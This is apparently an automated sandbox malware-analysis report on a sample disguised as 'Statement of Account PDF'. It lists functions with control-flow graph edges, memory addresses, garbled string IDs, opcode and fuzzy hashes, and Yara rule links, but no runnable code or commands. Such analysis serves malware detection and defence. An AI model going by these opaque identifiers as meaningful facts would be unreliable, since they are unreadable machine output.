                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                        • API String ID: 0-3076519024
                                                        • Opcode ID: c5081897fb8c8056105cf34b08c1bcac3a2298f1975ee95d619b686c22a5c25a
                                                        • Instruction ID: 3c209c813bc34938581cf3f1663a9976832f611b30b5d9b74ba7d7afcacd1b33
                                                        • Opcode Fuzzy Hash: c5081897fb8c8056105cf34b08c1bcac3a2298f1975ee95d619b686c22a5c25a
                                                        • Instruction Fuzzy Hash: 17729D31B002548FDB58AB79C85466E7BB6FFC8310F248669D40ADB3A5CE34ED46C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEA688 Relevance: 8.5, Strings: 6, Instructions: 1042COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 579 6cea688-6cea6a9 580 6cea6ab 579->580 581 6cea6b0-6cea79c 579->581 580->581 583 6ceafce-6ceaff6 581->583 584 6cea7a2-6cea8f9 581->584 587 6ceb6df-6ceb6e8 583->587 628 6cea8ff-6cea95a 584->628 629 6ceaf9c-6ceafcb 584->629 588 6ceb6ee-6ceb705 587->588 589 6ceb004-6ceb00d 587->589 591 6ceb00f 589->591 592 6ceb014-6ceb108 589->592 591->592 611 6ceb10a-6ceb116 592->611 612 6ceb132 592->612 614 6ceb118-6ceb11e 611->614 615 6ceb120-6ceb126 611->615 613 6ceb138-6ceb158 612->613 620 6ceb15a-6ceb1b3 613->620 621 6ceb1b8-6ceb232 613->621 616 6ceb130 614->616 615->616 616->613 634 6ceb6dc 620->634 639 6ceb289-6ceb2cc 621->639 640 6ceb234-6ceb287 621->640 637 6cea95f-6cea96a 628->637 638 6cea95c 628->638 629->583 634->587 641 6ceaeae-6ceaeb4 637->641 638->637 667 6ceb2d7-6ceb2dd 639->667 640->667 643 6cea96f-6cea98d 641->643 644 6ceaeba-6ceaf37 641->644 645 6cea98f-6cea993 643->645 646 6cea9e4-6cea9f9 643->646 684 6ceaf86-6ceaf8c 644->684 645->646 649 6cea995-6cea9a0 645->649 650 6cea9fb 646->650 651 6ceaa00-6ceaa16 646->651 653 6cea9d6-6cea9dc 649->653 650->651 656 6ceaa1d-6ceaa34 651->656 657 6ceaa18 651->657 661 6cea9de-6cea9df 653->661 662 6cea9a2-6cea9a6 653->662 659 6ceaa3b-6ceaa51 656->659 660 6ceaa36 656->660 657->656 665 6ceaa58-6ceaa5f 659->665 666 6ceaa53 659->666 660->659 668 6ceaa62-6ceaad3 661->668 663 6cea9ac-6cea9c4 662->663 664 6cea9a8 662->664 671 6cea9cb-6cea9d3 663->671 672 6cea9c6 663->672 664->663 665->668 666->665 673 6ceb334-6ceb340 667->673 674 6ceaae9-6ceac61 668->674 675 6ceaad5 668->675 671->653 672->671 677 6ceb2df-6ceb301 673->677 678 6ceb342-6ceb3ca 673->678 685 6ceac77-6ceadb2 674->685 686 6ceac63 674->686 675->674 676 6ceaad7-6ceaae3 675->676 676->674 680 6ceb308-6ceb331 677->680 681 6ceb303 677->681 707 6ceb54f-6ceb558 678->707 680->673 681->680 688 6ceaf8e-6ceaf94 684->688 689 6ceaf39-6ceaf83 684->689 697 6ceae16-6ceae2b 685->697 698 6ceadb4-6ceadb8 685->698 686->685 690 6ceac65-6ceac71 686->690 688->629 689->684 690->685 702 6ceae2d 697->702 703 6ceae32-6ceae53 697->703 698->697 700 6ceadba-6ceadc9 698->700 706 6ceae08-6ceae0e 700->706 702->703 704 6ceae5a-6ceae79 703->704 705 6ceae55 703->705 711 6ceae7b 704->711 712 6ceae80-6ceaea0 704->712 705->704 713 6ceadcb-6ceadcf 706->713 714 6ceae10-6ceae11 706->714 709 6ceb55e-6ceb5b9 707->709 710 6ceb3cf-6ceb3e4 707->710 736 6ceb5bb-6ceb5ee 709->736 737 6ceb5f0-6ceb61a 709->737 717 6ceb3ed-6ceb543 710->717 718 6ceb3e6 710->718 711->712 719 6ceaea7 712->719 720 6ceaea2 712->720 715 6ceadd9-6ceadfa 713->715 716 6ceadd1-6ceadd5 713->716 721 6ceaeab 714->721 723 6ceadfc 715->723 724 6ceae01-6ceae05 715->724 716->715 738 6ceb549 717->738 718->717 725 6ceb47d-6ceb4bd 718->725 726 6ceb438-6ceb478 718->726 727 6ceb4c2-6ceb502 718->727 728 6ceb3f3-6ceb433 718->728 719->721 720->719 721->641 723->724 724->706 725->738 726->738 727->738 728->738 745 6ceb623-6ceb6b6 736->745 737->745 738->707 749 6ceb6bd-6ceb6d5 745->749 749->634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: &IH3$4'^q$TJcq$Te^q$pbq$xbaq
                                                        • API String ID: 0-1216527603
                                                        • Opcode ID: cb68446657f5d2564efb297c69cd23db5718d07ec4f48b275f27a97429af9b94
                                                        • Instruction ID: af2dc99779ab733d066c1192cccb42e3acc6dcd45c90727c8fd22a2b614e27a1
                                                        • Opcode Fuzzy Hash: cb68446657f5d2564efb297c69cd23db5718d07ec4f48b275f27a97429af9b94
                                                        • Instruction Fuzzy Hash: 10B2A375A00628CFDB65CF69C984AD9BBB2BF89304F1581E9D509AB325DB319E81CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074A7A20 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 779 74a7a20-74a7a43 780 74a7a4a-74a7ac0 779->780 781 74a7a45 779->781 786 74a7ac3 780->786 781->780 787 74a7aca-74a7ae6 786->787 788 74a7ae8 787->788 789 74a7aef-74a7af0 787->789 788->786 788->789 790 74a7c3e-74a7cae 788->790 791 74a7b0c-74a7b4b 788->791 792 74a7c22-74a7c39 788->792 793 74a7b50-74a7b54 788->793 794 74a7b80-74a7b92 788->794 795 74a7c01-74a7c1d 788->795 796 74a7bc6-74a7bfc 788->796 797 74a7b97-74a7bc1 788->797 798 74a7af5-74a7b0a 788->798 789->790 811 74a7cb6-74a7cc0 790->811 791->787 792->787 799 74a7b56-74a7b65 793->799 800 74a7b67-74a7b6e 793->800 794->787 795->787 796->787 797->787 798->787 802 74a7b75-74a7b7b 799->802 800->802 802->787
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q$)"
                                                        • API String ID: 0-4031938444
                                                        • Opcode ID: 783d9b125779a37d24f1c0bd0bd36affec7fa430ab445e3fb69deb88babf9797
                                                        • Instruction ID: bdf63e30a901ad65acb992da6833eac6fed2065a424240eaacc98964a2a53ddc
                                                        • Opcode Fuzzy Hash: 783d9b125779a37d24f1c0bd0bd36affec7fa430ab445e3fb69deb88babf9797
                                                        • Instruction Fuzzy Hash: D581C3B4E002099FDB08CFEAC9846EEBBB2FF89310F24942AD415AB354D7349946CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074A9BC0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tIh
                                                        • API String ID: 0-443931868
                                                        • Opcode ID: 6c3cd37dbbc21670a6792e7005c27377856d3f71375e4e3845d0ed84f00e8acc
                                                        • Instruction ID: 756da5a5b20ebfac758b38e483b28fe9ad4210f4122b68d8bd7ddd3306f6f200
                                                        • Opcode Fuzzy Hash: 6c3cd37dbbc21670a6792e7005c27377856d3f71375e4e3845d0ed84f00e8acc
                                                        • Instruction Fuzzy Hash: 48D115B0D1421AEBCB04CF99D5848EEFBB2FF99300F14D55AD512AB254D734AA82CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE6CD8 Relevance: .8, Instructions: 805COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a42b12b0bd18798e4d4335ea0e350c96b72d2022d75e8a5dd379489696d33c5
                                                        • Instruction ID: fcea9d3011fe1c4bda68c0b788badb0c52621dfd536ca4454933f44d7c1111e8
                                                        • Opcode Fuzzy Hash: 6a42b12b0bd18798e4d4335ea0e350c96b72d2022d75e8a5dd379489696d33c5
                                                        • Instruction Fuzzy Hash: 00721B70A00219CFDB54DF68C884AEDB7B2FF89310F1586A9D459AB351DB34AE85CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CCC550 Relevance: .7, Instructions: 668COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707322732.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6cc0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d08dcb20eecec395334e2aa8589c4d55e6fc3aa146ac48969ffdd3abc086044d
                                                        • Instruction ID: 551cfa895803d223f7546486cc15161b80cb649088dde9f78bdfd4c49fe016f5
                                                        • Opcode Fuzzy Hash: d08dcb20eecec395334e2aa8589c4d55e6fc3aa146ac48969ffdd3abc086044d
                                                        • Instruction Fuzzy Hash: AC52E534A006048FCB54DF68C588A6DB7F2FF89315F2585ACD40A9B765DB30ED86CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE1808 Relevance: .6, Instructions: 588COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0f393b3102f18bd9db8c73256a2632071484746d9eb04d91fe286c4e1241c06
                                                        • Instruction ID: e0fcb9020bc6248586221f6741891783a30433839bf0dfa70e0746c51d16761e
                                                        • Opcode Fuzzy Hash: f0f393b3102f18bd9db8c73256a2632071484746d9eb04d91fe286c4e1241c06
                                                        • Instruction Fuzzy Hash: D1525B34A003458FDB14DF28C844B99B7B2FF89314F2586A9D5586F3A2DB71AD86CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE17F8 Relevance: .6, Instructions: 577COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: edc95510e5b5c47ce0447ff60f23e72f209086928ccdf78fc9daf8f5d9dfd758
                                                        • Instruction ID: 15c5cc945cd5801fb7528519e9df1ad82ecbdac90b7014aa510ca6aeb2b4dec6
                                                        • Opcode Fuzzy Hash: edc95510e5b5c47ce0447ff60f23e72f209086928ccdf78fc9daf8f5d9dfd758
                                                        • Instruction Fuzzy Hash: 0B524B34A003458FDB14DF28C844B99B7B2FF89314F2586A9D5586F3A2DB71A986CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AC900 Relevance: .2, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 214d12495148c75c7de29a73a4d351e06ec09273a11c8e253b2e2a46308e5ef2
                                                        • Instruction ID: 95fac4909dc26f43358ab3c48b5ccd7459a0294c255d5e0bc3f9bf883eba1084
                                                        • Opcode Fuzzy Hash: 214d12495148c75c7de29a73a4d351e06ec09273a11c8e253b2e2a46308e5ef2
                                                        • Instruction Fuzzy Hash: 8B8112B4E1421ADFCB44CFA9D8809EEFBB6FB9E200F10991AD415B7214D7349906CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE9CB8 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 625ca9bfe781f18bffde463c1c02d9b5c72ee1f5fea4b65698decc6267b42e1e
                                                        • Instruction ID: dd731879ee3a53235b557ac69fa6b24202b6e4d66cd21e201125b5b3210abe8f
                                                        • Opcode Fuzzy Hash: 625ca9bfe781f18bffde463c1c02d9b5c72ee1f5fea4b65698decc6267b42e1e
                                                        • Instruction Fuzzy Hash: DE2108B1E056588BEB58DFABD8046DEBAF7AFC8300F14C07AD4196B258DB3409428F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE9CC8 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f7480c14b3f6ff30357ace4356bbd9685da64fcbc505a43e9ba2363a211851d
                                                        • Instruction ID: cda56c45b80c707434acb068113570865a96ce7e412b8f0262ba6bf087fc8f44
                                                        • Opcode Fuzzy Hash: 2f7480c14b3f6ff30357ace4356bbd9685da64fcbc505a43e9ba2363a211851d
                                                        • Instruction Fuzzy Hash: DD11E9B1E056588BEB58DFABD9042DEBAF7AFC8300F04D07AD519AA258DB7409458F50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE9D5F Relevance: 5.1, Strings: 4, Instructions: 98COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 750 6ce9d5f-6ce9dfa 757 6ce9dfc-6ce9e08 750->757 758 6ce9e24 750->758 759 6ce9e0a-6ce9e10 757->759 760 6ce9e12-6ce9e18 757->760 761 6ce9e2a-6cea08b 758->761 762 6ce9e22 759->762 760->762 770 6cea08d-6cea099 761->770 771 6cea0b5 761->771 762->761 772 6cea09b-6cea0a1 770->772 773 6cea0a3-6cea0a9 770->773 774 6cea0bb-6cea376 call 74adde0 771->774 775 6cea0b3 772->775 773->775 777 6cea37c-6cea38b 774->777 775->774
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: ec2d63fc1aa53c2e5a5a7e232df09b82e73b709d2fd7f6e939f17b5762fb6f2f
                                                        • Instruction ID: 8f869f66464461c20a88cfbf7d80b89bc17d9ed4eab24e94c8a4f294ca684d31
                                                        • Opcode Fuzzy Hash: ec2d63fc1aa53c2e5a5a7e232df09b82e73b709d2fd7f6e939f17b5762fb6f2f
                                                        • Instruction Fuzzy Hash: 1541D474E00218CFEB64DF65D844B99B7B2FB49300F1080D9E54AA7355CB305E85CF52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2768 Relevance: 2.8, Strings: 2, Instructions: 314COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 834 6ce2768-6ce2774 835 6ce275f-6ce2767 834->835 836 6ce2776-6ce27ae 834->836 835->834 839 6ce27b4-6ce27c7 836->839 840 6ce2b71-6ce2b9c 836->840 843 6ce27db-6ce2801 839->843 844 6ce27c9-6ce27d3 839->844 853 6ce2ba3-6ce2be6 840->853 852 6ce2807-6ce280d 843->852 843->853 844->843 925 6ce280f call 6ce2d28 852->925 926 6ce280f call 6ce2d01 852->926 877 6ce2bec-6ce2bf3 853->877 878 6ce2be8-6ce2bea 853->878 854 6ce2814-6ce281d 856 6ce28ff-6ce2903 854->856 857 6ce2823-6ce283d 854->857 858 6ce2905-6ce290b 856->858 859 6ce2913-6ce2923 856->859 863 6ce283f-6ce284d 857->863 864 6ce2855-6ce2871 857->864 858->859 866 6ce295a-6ce295f 859->866 867 6ce2925-6ce294e 859->867 863->864 880 6ce28ce-6ce28f2 864->880 881 6ce2873-6ce287e 864->881 872 6ce2965-6ce2978 call 6ce2368 866->872 879 6ce297d-6ce2994 872->879 883 6ce2c14-6ce2c1c 877->883 884 6ce2bf5-6ce2c09 877->884 878->877 891 6ce29ac-6ce29c8 879->891 892 6ce2996-6ce29a4 879->892 895 6ce28fc 880->895 896 6ce28f4 880->896 887 6ce2896-6ce28a7 881->887 888 6ce2880-6ce2886 881->888 884->883 901 6ce28ae-6ce28b1 887->901 902 6ce28a9-6ce28ac 887->902 893 6ce288a-6ce288c 888->893 894 6ce2888 888->894 905 6ce2a3c-6ce2a60 891->905 906 6ce29ca-6ce29d5 891->906 892->891 893->887 894->887 895->856 896->895 904 6ce28b4-6ce28bb 901->904 902->904 908 6ce28c1-6ce28cc 904->908 918 6ce2a6a 905->918 919 6ce2a62 905->919 910 6ce29ed-6ce29fa 906->910 911 6ce29d7-6ce29dd 906->911 908->880 908->881 916 6ce2a0e-6ce2a3a 910->916 917 6ce29fc-6ce2a08 910->917 914 6ce29df 911->914 915 6ce29e1-6ce29e3 911->915 914->910 915->910 916->905 916->906 917->916 918->840 919->918 925->854 926->854
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q$PH^q
                                                        • API String ID: 0-1598597984
                                                        • Opcode ID: 3ecb98ad695cff41fc5451f37d030c8e7622abf51fcb84030cb8762ed2a9c02e
                                                        • Instruction ID: 531f3dd3d2863a3474b6bfe3d62635d59276f7e29f8c478cc32557923469e739
                                                        • Opcode Fuzzy Hash: 3ecb98ad695cff41fc5451f37d030c8e7622abf51fcb84030cb8762ed2a9c02e
                                                        • Instruction Fuzzy Hash: 8CC13835A002048FCB64DF78C958A9DBBF6FF89310B2545A9E416EB3A1CB34ED45CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE9BD8 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 927 4ee9bd8-4ee9bfa 928 4ee9bfc-4ee9c02 927->928 929 4ee9c03-4ee9c0d 927->929 931 4ee9e49-4ee9e74 call 4ee8d00 929->931 932 4ee9c13-4ee9c2c call 4ee6d84 * 2 929->932 939 4ee9e7b-4ee9f28 call 4ee8d00 931->939 932->939 940 4ee9c32-4ee9c54 932->940 964 4ee9f3f-4ee9f65 939->964 965 4ee9f2a-4ee9f3d 939->965 948 4ee9c56-4ee9c64 call 4ee6d94 940->948 949 4ee9c65-4ee9c74 940->949 956 4ee9c99-4ee9cba 949->956 957 4ee9c76-4ee9c93 949->957 966 4ee9cbc-4ee9ccd 956->966 967 4ee9d0a-4ee9d32 956->967 957->956 974 4ee9f6e 964->974 975 4ee9f67-4ee9f6d 964->975 976 4ee9f75-4ee9f82 965->976 972 4ee9ccf-4ee9ce7 call 4ee6da4 966->972 973 4ee9cfc-4ee9d00 966->973 997 4ee9d35 call 6cc11e8 967->997 998 4ee9d35 call 6ccaf48 967->998 999 4ee9d35 call 6ccaf38 967->999 1000 4ee9d35 call 6cc11d9 967->1000 1001 4ee9d35 call 4eea128 967->1001 1002 4ee9d35 call 4eea0d0 967->1002 1003 4ee9d35 call 4eea3e0 967->1003 1004 4ee9d35 call 4eea101 967->1004 1005 4ee9d35 call 4eedb21 967->1005 985 4ee9cec-4ee9cfa 972->985 986 4ee9ce9-4ee9cea 972->986 973->967 974->976 975->974 981 4ee9d38-4ee9d5d 988 4ee9d5f-4ee9d74 981->988 989 4ee9da3 981->989 985->972 985->973 986->985 988->989 992 4ee9d76-4ee9d99 988->992 989->931 992->989 996 4ee9d9b 992->996 996->989 997->981 998->981 999->981 1000->981 1001->981 1002->981 1003->981 1004->981 1005->981
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$Hbq
                                                        • API String ID: 0-4258043069
                                                        • Opcode ID: e671a94c45f42b512eae84a7611f7e90f985a9d7b6310c5fc6eeb146f12575c8
                                                        • Instruction ID: bd616236a10be4ba64d0044f3fb181f3cb64e1ef39fb80fc071a18ec20beacb7
                                                        • Opcode Fuzzy Hash: e671a94c45f42b512eae84a7611f7e90f985a9d7b6310c5fc6eeb146f12575c8
                                                        • Instruction Fuzzy Hash: 22A17C74A002188FDB04EF69C5549AEBBF6FF89314F2044A9D405AB3A2CB35EC41CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEB814 Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1006 4eeb814-4eeb88a call 4eea8f8 1012 4eeb88c-4eeb88e 1006->1012 1013 4eeb8f0-4eeb91c 1006->1013 1014 4eeb894-4eeb8a0 1012->1014 1015 4eeb923-4eeb92b 1012->1015 1013->1015 1019 4eeb8a6-4eeb8e1 call 4eea904 1014->1019 1020 4eeb932-4eeba6d 1014->1020 1015->1020 1032 4eeb8e6-4eeb8ef 1019->1032 1038 4eeba73-4eeba81 1020->1038 1039 4eeba8a-4eebad0 1038->1039 1040 4eeba83-4eeba89 1038->1040 1045 4eebadd 1039->1045 1046 4eebad2-4eebad5 1039->1046 1040->1039 1047 4eebade 1045->1047 1046->1045 1047->1047
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$Hbq
                                                        • API String ID: 0-4258043069
                                                        • Opcode ID: abc88107505f9db39ae936aa88355bceec8a4b221bba47e341b04b4fe7f85f18
                                                        • Instruction ID: cd232b5109d5e2cc6636461991562f8b08d3b7531a1397e42ac3409a0c9903e7
                                                        • Opcode Fuzzy Hash: abc88107505f9db39ae936aa88355bceec8a4b221bba47e341b04b4fe7f85f18
                                                        • Instruction Fuzzy Hash: 13817C74E003598FDB04DFA9C8946EEBBF2FF88310F14812AD409AB351DB749946CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4AD0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1048 4ee4ad0-4ee69bb 1051 4ee69bd-4ee69c1 1048->1051 1052 4ee69c2-4ee6a21 1048->1052 1058 4ee6a2e 1052->1058 1059 4ee6a23-4ee6a2c 1052->1059 1060 4ee6a30-4ee6a35 1058->1060 1059->1060 1061 4ee6a7a-4ee6aaf 1060->1061 1062 4ee6a37-4ee6a39 1060->1062 1064 4ee6ab6-4ee6b42 1061->1064 1063 4ee6a3b-4ee6a3e 1062->1063 1062->1064 1063->1064 1065 4ee6a40-4ee6a43 1063->1065 1085 4ee6b94-4ee6b96 1064->1085 1086 4ee6b44-4ee6b4a 1064->1086 1065->1064 1067 4ee6a45-4ee6a48 1065->1067 1067->1064 1069 4ee6a4a-4ee6a4e 1067->1069 1071 4ee6a55-4ee6a6a 1069->1071 1072 4ee6a50-4ee6a53 1069->1072 1074 4ee6a75-4ee6a79 1071->1074 1075 4ee6a6c-4ee6a70 call 4ee4aec 1071->1075 1072->1071 1072->1074 1075->1074 1087 4ee6b5f-4ee6b65 1086->1087 1088 4ee6b4c-4ee6b54 1086->1088 1089 4ee6b7b-4ee6b81 1087->1089 1090 4ee6b67-4ee6b7a 1087->1090 1094 4ee6b5a call 4ee6ba8 1088->1094 1095 4ee6b5a call 4ee6b98 1088->1095 1089->1085 1092 4ee6b83-4ee6b8b 1089->1092 1091 4ee6b5c-4ee6b5e 1092->1085 1094->1091 1095->1091
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq$Hbq
                                                        • API String ID: 0-4081012451
                                                        • Opcode ID: 03bd2fb0a4194c59396652479c970dc03d7cc689bb1727020de73d22ff739750
                                                        • Instruction ID: 1282dd62381ec2ce541f852e506ca4b201e98315fa3269900e9f752c9341c32e
                                                        • Opcode Fuzzy Hash: 03bd2fb0a4194c59396652479c970dc03d7cc689bb1727020de73d22ff739750
                                                        • Instruction Fuzzy Hash: C8513031B041408FD718EF79C0406BABBA2FFC4344B1885BAE4499B762DE35BC86DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE9F41 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1096 6ce9f41 1143 6ce9f41 call 6ceb87a 1096->1143 1144 6ce9f41 call 6ceb880 1096->1144 1097 6ce9f47-6ce9f68 1099 6ce9d4e-6ce9d53 1097->1099 1100 6ce9f6e 1097->1100 1101 6ce9d59-6ce9d5a 1099->1101 1102 6ce9fb2-6cea188 call 6ce9498 1099->1102 1100->1102 1101->1102 1114 6cea189-6cea276 call 74a6688 1102->1114 1119 6cea1dd-6cea2a9 1114->1119 1120 6cea1c3-6cea27f 1114->1120 1127 6cea2b2-6cea2b3 1119->1127 1120->1114 1123 6cea285-6cea286 call 74a6808 1120->1123 1130 6cea218-6cea2d3 1123->1130 1127->1120 1136 6cea305 1130->1136 1137 6cea2d5-6cea304 1130->1137 1139 6cea306 1136->1139 1137->1136 1139->1139 1143->1097 1144->1097
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        • Opcode ID: bf8428315e1f7ae0a4d81d386377f50a2d3711815d11849522dc6ff7f6a006c7
                                                        • Instruction ID: cf6984d3b049e067e84aeea613d675983f5be8a6fc394434a5150298667597cf
                                                        • Opcode Fuzzy Hash: bf8428315e1f7ae0a4d81d386377f50a2d3711815d11849522dc6ff7f6a006c7
                                                        • Instruction Fuzzy Hash: 5851D774E09218CFDB54DFA9D844BEDBBB6FB49300F206129E50AA7385DB349A44CF90
                                                        Uniqueness

